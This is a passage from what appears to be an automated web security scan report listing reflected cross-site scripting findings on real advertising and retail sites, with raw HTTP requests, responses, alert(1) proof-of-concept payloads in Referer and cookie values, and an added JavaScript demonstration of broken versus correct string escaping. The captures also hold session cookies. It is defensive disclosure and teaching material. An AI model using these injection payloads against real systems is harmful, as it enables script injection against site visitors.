Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;
Referer: http://www.google.com/search?hl=en&q=e9c52\"%3balert(1)//ffa0aa0cec3

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?2744&2/11/2011 2:40:59 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:40:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:41:00 GMT
Connection: close
Content-Length: 164440


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
CalendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("2744","2744","2744","43326","72","organicgglgeneric_e9c52\\";alert(1)//ffa0aa0cec3","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.94. http://tags.bluekai.com/site/50 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/50

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 243c4'-alert(1)-'d364363071b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, this behaviour is not trivial to exploit against another user. In the past, client-side technologies such as Flash could be used to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability. Note, however, that the Referer value is derived from the URL of the page the user came from, so an attacker who induces the victim to follow a link from an attacker-controlled URL containing the payload has some control over this header; how much depends on the browser's referrer policy and on which characters it percent-encodes in the URL.
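As an added example (not code from the scan report or from the sites it covers), the following JavaScript reproduces the three string-escaping behaviours seen in 2.87 to 2.94 and checks each against the real JavaScript parser: no escaping at all (2.94), backslashing only the quotation mark (2.87 to 2.93), and a correct escaper. The function names, the var ref = ... statement and the payloads are constructed for illustration; the report's alert(1) is replaced by a canary assignment because there is no alert() outside a browser:

```javascript
// Added example, not code from the scan report or from the sites it covers.
// Three ways a server can place an attacker-controlled Referer value inside a
// JavaScript string literal, checked with the real JS parser (new Function).
// The report's alert(1) is replaced by the canary assignment pwned = true.

// (a) 2.94 style: value dropped into a single-quoted literal with no escaping.
function noEscapeSingle(value) {
  return "var ref = '" + value + "';";
}

// (b) 2.87-2.93 style: only the double quote is backslashed. A backslash that
// is already in the input is left alone, so \" in the input becomes \\" and
// the quote is live again.
function naiveEscapeDouble(value) {
  return 'var ref = "' + value.replace(/"/g, '\\"') + '";';
}

// (c) Fix: escape the backslash FIRST (so the attacker cannot supply one that
// neutralises ours), then both quote characters, then < and > (so "</script>"
// cannot appear in the literal and close the HTML script block), then the line
// terminators, which would otherwise end a JS string literal.
function jsStringEscape(value) {
  return value
    .replace(/\\/g, '\\\\')
    .replace(/"/g, '\\"')
    .replace(/'/g, "\\'")
    .replace(/</g, '\\x3c')
    .replace(/>/g, '\\x3e')
    .replace(/\r/g, '\\r')
    .replace(/\n/g, '\\n')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}
function safeEscapeDouble(value) {
  return 'var ref = "' + jsStringEscape(value) + '";';
}
function safeEscapeSingle(value) {
  return "var ref = '" + jsStringEscape(value) + "';";
}

// Run the generated statement with a canary. If the input escapes the string
// literal, the injected code flips `pwned`; otherwise `ref` holds the input
// verbatim. The newline before `return` matters: an injected // comment would
// otherwise swallow the return statement, just as it swallows the rest of the
// line in the vulnerable page.
function breaksOut(snippet) {
  try {
    return new Function(
      'var pwned = false;\n' + snippet + '\nreturn { pwned: pwned, ref: ref };'
    )();
  } catch (e) {
    return { pwned: false, ref: null, error: e.name };
  }
}

// Constructed payloads mirroring the report's, canary in place of alert(1).
const singleQuotePayload = "243c4'-(pwned=true)-'d364363071b";
const doubleQuotePayload = '56d19\\";pwned=true;//701eaddac4a'; // one real backslash

console.log('no escaping   :', breaksOut(noEscapeSingle(singleQuotePayload)));   // pwned: true
console.log('quote only    :', breaksOut(naiveEscapeDouble(doubleQuotePayload))); // pwned: true, ref: 56d19\
console.log('proper escape :', breaksOut(safeEscapeDouble(doubleQuotePayload)));  // pwned: false, ref intact
```

Ordering is the whole point of jsStringEscape: escaping the quote before the backslash would turn the attacker's \" into \\" again, reproducing the bug. In practice, prefer a library encoder (or emitting the value as JSON into a data attribute and reading it from script) over a hand-written one.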

Request

GET /site/50?ret=html&limit=4&btp=1&phint=kw%3D&phint=eid%3D283&phint=a%3D-1&phint=g%3D0&uhint=zip%3D0&phint=tcat%3D152869&phint=kh%3DDBDCB53F2576976D806D6498794024FC&phint=bread%3D[Jewelry%20&%20Watches,%20Engagement%20&%20Wedding,%20Engagement%20Rings,%20Diamond,%20Diamond%20Solitaire%20with%20Accents]&phint=bin%3D1499.99&phint=asp%3DMain%20Stone%20Shape,Heart,Main%20Stone%20Treatment,Not%20Enhanced,Carat%20Total%20Weight,0.90%20-%201.39,Exact%20Carat%20Total%20Weight,.90,Main%20Stone%20Certification/Grading,EGL%20USA,Metal,14k%20White%20Gold,Metal%20Purity,14k,Ring%20Size,6,Main%20Stone,Diamond,Style,Engagement,Jewelry%20Type,Ring,Size,6,Gender,Women's HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=243c4'-alert(1)-'d364363071b
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJpE8VaQtwGt6JKHRxRlMYUehXOxymGwj1kYVzy1cny1eOvulA9hDSeRPV+7/WLPvwqdoutxBRZBQKWJA1UsT16n1RVJxRTw/Lq/z9zrJQADu2UU9GGO9BVGsj1=; bkw4=[SNIP]; bklc=4d55308f; bk=yQSpJZmZF9ysHNJo; bkc=[SNIP]; bkst=KJhkAnNv96WDCxzBYYqOyk/DYyLnPIq7p+0jxixZSXyZi6Q6DjrxpHoJk/6sTb3BMSt5gteoWtQkwGYkRsV77VIQLNLJlrg07U18C8LCE8wWpF+ahzIxjfLFWv8NV0+xMQAj5ue9y9kWtcUY+QRCOOgEh4MBLd8Ub8XQGIQGsLHHqHy+IgjGZQ9aTWoEek/pQ6oydEsV0awjBYl5dK04bXzDl4hc5hqBWfX6G1KBJ7MPA323y6S840qweb35653sWAapYpbEwF4Vm6mvOq4rrANdXXugRgZNcD4fkXmTTQpgXwmNRZl8UBGHaxUeMEszYD6jYFa07uEmogJCkWFvrWODisi6W5t2cuFw8x7JAzBN+IB57HqfrN8diu4XNFJaWF4YkLwLApuP/WDnxZe/mE4/QpRLtf2v3RNK4RQndi28rkgN; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 11 Feb 2011 18:33:12 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=PbEVTB7F/B6sHNJo; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=[SNIP]; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJhn8sPQKBWxbLFWT19WREW04muaLKb0yaM3zea5cQSsgVXeQSyjleYVBNuVZKWmn6u1iDssMTsCQBD4vYLnjEWpz9OkJuu2QVvixnsgNL89kioxfw2nV0OgWCLeyh1QiTNOMQdYRZuxOnJu2qV9n9Yp/0jj; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsn/pkOQuWkvuDT0BDTp1MDlLpxlufWy1WLh1fs61nz61E90uD+I6He3YNE1y1Sxka6zEbym9WSLsJQ=; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkp1=KJhMRZOQ19niaytCFGy199hn9A9=; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpE8tOQRsxyRZOQW9qiaytCFQhGQ/zOovvaATWCXbO1rRATi1zaaOmW3F20IloMLPrJ4qU/mFKcPuUtFWOhaGq+zQy1I+fwfw8oQ5Hp9MULZXf9T1BLf3FgnwwbAjZDwRyIyLM9y1f9q1M9XmOKR5G2qVENr8Zy3t5kZ9BDltEkGgjakhMNq9pUQafzdvJ/XhHHb+AjdQnP7yLTD1VrMbpI0D+qgm38sHhBsOiAfeZ6XXc34yae0bmPQVcgt6e4w0LdUFJBugYc6481/wUgQmopCD+Yw9pHlRmrcZxIWXB+DySsv9XF+Qhe8w9cZ4IgnZ+w0Kx1KhQBeWYQIIUBsOQT1t20lMBsPiXCbKlfaHh4n4RysZQTD/VxOxBe+jJgTDHE2wx9zDK9wRpmjyvj2xuGFFHpErQvDtEpxKcMokgvB/LMt2fbF7dF2nyiIpYyIPSVe9yc4yH0qL/y48z7e8BtK8A2M9SojtjyOv3dFX3NqJLone0UJAcXslUM1kI2qhL6FDtOZZXcPOdiBBFCB/ofdQw5QhTIIVeprRe3kXplp+s6Q/VdRy1eylzLTqXngnfDZGaChzNNUvTVbwsnqM8/wx5e1PY2kAuGUvXaz4kgAh6eQdzc++eJkLMrFtg+e92wicLvf/1Rxm7Cn2OXZ8Abi3+L6z14lE6nZWe37yeBMd7BZV++eNnw9L0AA71RsxoRdEcz/y6mEh9GrqO4poWW2zh+VN7zymGjxmgPYSAlYZuvSlK9CxXpMFxtObpIOPO5iBbWssnPFyu3IfnG5zPtO8eFxKb4j9nhHIovxrbuXrgNrm49QOj4Lwx9YAXsC7OcOGjFCdqZ99YGGDbF; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 12-Feb-2011 18:33:12 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 737
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1068244&t=2" width=1 height=1 border=0 alt="">
<img src="http://leadback.advertising.com/adcedge/lb?si
...[SNIP]...
<script>var referrer='http://www.google.com/search?hl=en&q=243c4'-alert(1)-'d364363071b'; var hashID='dbdcb53f2576976d806d6498794024fc'; var taxonomyJSON=[];</script>
...[SNIP]...

2.95. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the application's response. The payload 8545a<script>alert(1)</script>a64660bacfd was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

Note on the reflection context: the response is served as application/x-javascript, and the echoed value lands inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object, not as plain text between HTML tags as the scanner's template states. A <script> tag inside a JavaScript string literal is inert, so this particular payload does not execute. The reflection is unencoded, however, and a payload containing a single quote would need to be tested to confirm that the string literal can be terminated and arbitrary JavaScript injected.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1420280 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:17:53 2011&prad=1160023&arc=1420279&; BMX_G=method->-1,ts->1297606673; BMX_3PC=18545a<script>alert(1)</script>a64660bacfd; ar_s_p84053757=1->1297606675; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:24:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=2&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:24:40 2011&prad=1160022&arc=1420280&; expires=Sat 14-May-2011 14:24:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1420280",Location:COMS
...[SNIP]...
757": '1->1297606675', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "BMX_3PC": '18545a<script>alert(1)</script>a64660bacfd', "BMX_BR": 'pid=p84532700&prad=47146&arc=34917&exp=1297559105', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&', "ar_p45555483"
...[SNIP]...

2.96. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_BR cookie is copied into the application's response. The payload 1ca26<script>alert(1)</script>97822c3901f was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.

Note on the reflection context: as with the other cookies reflected by this resource, the response is served as application/x-javascript and the echoed value lands inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object, not between HTML tags. A <script> tag inside a JavaScript string literal is inert, so this particular payload does not execute; a payload containing a single quote would need to be tested to confirm that the string literal can be terminated and arbitrary JavaScript injected.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=12975591051ca26<script>alert(1)</script>97822c3901f; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:56 2011&recExp=Sun Feb 13 14:17:56 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606676; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
n=4&arc=38899481&', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "BMX_BR": 'pid=p84532700&prad=47146&arc=34917&exp=12975591051ca26<script>alert(1)</script>97822c3901f', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&', "ar_p84532700": 'exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:
...[SNIP]...

2.97. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the application's response. The payload e83e8<script>alert(1)</script>ee18e5371e6 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

Note on the reflection context: the response is served as application/x-javascript and the echoed value lands inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object, not between HTML tags. A <script> tag inside a JavaScript string literal is inert, so this particular payload does not execute; a payload containing a single quote would need to be tested to confirm that the string literal can be terminated and arbitrary JavaScript injected.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1420280 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:17:53 2011&prad=1160023&arc=1420279&; BMX_G=method->-1,ts->1297606673e83e8<script>alert(1)</script>ee18e5371e6; BMX_3PC=1; ar_s_p84053757=1->1297606675; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:24:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=2&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:24:40 2011&prad=1160022&arc=1420280&; expires=Sat 14-May-2011 14:24:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1420280",Location:COMS
...[SNIP]...
Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "BMX_3PC": '1', "BMX_BR": 'pid=p84532700&prad=47146&arc=34917&exp=1297559105', "BMX_G": 'method->-1,ts->1297606673e83e8<script>alert(1)</script>ee18e5371e6', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&', "ar_p84532700": 'exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:
...[SNIP]...

2.98. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the application's response. The payload 44e5b<script>alert(1)</script>1db2f778374 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

Note on the reflection context: the response is served as application/x-javascript and the echoed value lands inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object, not between HTML tags. A <script> tag inside a JavaScript string literal is inert, so this particular payload does not execute; a payload containing a single quote would need to be tested to confirm that the string literal can be terminated and arbitrary JavaScript injected.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-129445681044e5b<script>alert(1)</script>1db2f778374

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:56 2011&recExp=Sun Feb 13 14:17:56 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606676; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
